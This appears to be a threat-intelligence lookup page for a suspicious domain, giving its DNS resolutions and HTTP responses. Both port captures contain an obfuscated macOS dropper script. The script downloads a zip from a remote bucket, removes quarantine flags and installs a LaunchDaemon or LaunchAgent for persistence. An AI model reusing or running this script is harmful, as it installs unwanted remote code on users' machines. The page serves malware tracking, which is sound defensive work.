Help
RSS
API
Feed
Maltego
Contact
Domain > xcuxkxtcxodmo.dynamiclush.com
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-06-30
52.44.181.155
(
ClassC
)
2025-09-08
54.164.206.25
(
ClassC
)
2025-10-15
18.211.80.86
(
ClassC
)
Port 80
HTTP/1.1 200 OKServer: awselb/2.0Date: Mon, 08 Sep 2025 01:07:01 GMTContent-Type: text/plainContent-Length: 4083Connection: keep-aliveAccess-Control-Allow-Methods: OPTIONS,PUT,POST,GETAccess-Control-E HsKRIEUvIorQxPbWaEfUcom.optimize.speed.devicebvUDZZfczXhUSielgKYZOptimizeSpeedDeviceCSSHsqFJHaAuiectfICHgmrjkbwpmyixegwmtggeoNuTAgTskqxTYgLAOrQT/tmp/$CSSHsqFJHaAuiectfICHdFwGMcShBUayuZnvgyoYOptimizeSpeedDeviceif `id -u` 0 ; then sIhqZQVHeAJDauLDAtgD/Library/LaunchDaemons/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw/Library/Application Support/$bvUDZZfczXhUSielgKYZ if ! -f $sIhqZQVHeAJDauLDAtgD ; then mkdir -p $PUSzbjczNoElNLFObsYw curl --retry 5 -f https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip -o $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip ditto -x -k $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip $PUSzbjczNoElNLFObsYw xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY mkdir -p $oNuTAgTskqxTYgLAOrQT touch $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist echo ?xml version1.0 encodingUTF-8?> !DOCTYPE plist PUBLIC -//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd> plist version1.0> dict> key>Label/key> string>$HsKRIEUvIorQxPbWaEfU/string> key>Program/key> string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY/string> key>RunAtLoad/key> true /> key>StartInterval/key> integer>1800/integer> /dict> /plist> > $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist chmod -R 777 $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist cp -f $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist $sIhqZQVHeAJDauLDAtgD chmod -R 644 $sIhqZQVHeAJDauLDAtgD launchctl load -w $sIhqZQVHeAJDauLDAtgD rm -rf $oNuTAgTskqxTYgLAOrQT rm $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip fielse RWNGIYDH$(ls -l /dev/console | awk / / { print $3 }) DHylOuwKNSVnPzVyUjRl$(eval echo ~$(echo $RWNGIYDH)) sIhqZQVHeAJDauLDAtgD$DHylOuwKNSVnPzVyUjRl/Library/LaunchAgents/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw$DHylOuwKNSVnPzVyUjRl/Library/
Port 443
HTTP/1.1 200 OKServer: awselb/2.0Date: Mon, 08 Sep 2025 01:07:02 GMTContent-Type: text/plainContent-Length: 4083Connection: keep-aliveAccess-Control-Allow-Methods: OPTIONS,PUT,POST,GETAccess-Control-E HsKRIEUvIorQxPbWaEfUcom.optimize.speed.devicebvUDZZfczXhUSielgKYZOptimizeSpeedDeviceCSSHsqFJHaAuiectfICHgmrjkbwpmyixegwmtggeoNuTAgTskqxTYgLAOrQT/tmp/$CSSHsqFJHaAuiectfICHdFwGMcShBUayuZnvgyoYOptimizeSpeedDeviceif `id -u` 0 ; then sIhqZQVHeAJDauLDAtgD/Library/LaunchDaemons/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw/Library/Application Support/$bvUDZZfczXhUSielgKYZ if ! -f $sIhqZQVHeAJDauLDAtgD ; then mkdir -p $PUSzbjczNoElNLFObsYw curl --retry 5 -f https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip -o $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip ditto -x -k $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip $PUSzbjczNoElNLFObsYw xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY mkdir -p $oNuTAgTskqxTYgLAOrQT touch $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist echo ?xml version1.0 encodingUTF-8?> !DOCTYPE plist PUBLIC -//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd> plist version1.0> dict> key>Label/key> string>$HsKRIEUvIorQxPbWaEfU/string> key>Program/key> string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY/string> key>RunAtLoad/key> true /> key>StartInterval/key> integer>1800/integer> /dict> /plist> > $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist chmod -R 777 $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist cp -f $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist $sIhqZQVHeAJDauLDAtgD chmod -R 644 $sIhqZQVHeAJDauLDAtgD launchctl load -w $sIhqZQVHeAJDauLDAtgD rm -rf $oNuTAgTskqxTYgLAOrQT rm $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip fielse RWNGIYDH$(ls -l /dev/console | awk / / { print $3 }) DHylOuwKNSVnPzVyUjRl$(eval echo ~$(echo $RWNGIYDH)) sIhqZQVHeAJDauLDAtgD$DHylOuwKNSVnPzVyUjRl/Library/LaunchAgents/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw$DHylOuwKNSVnPzVyUjRl/Library/
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]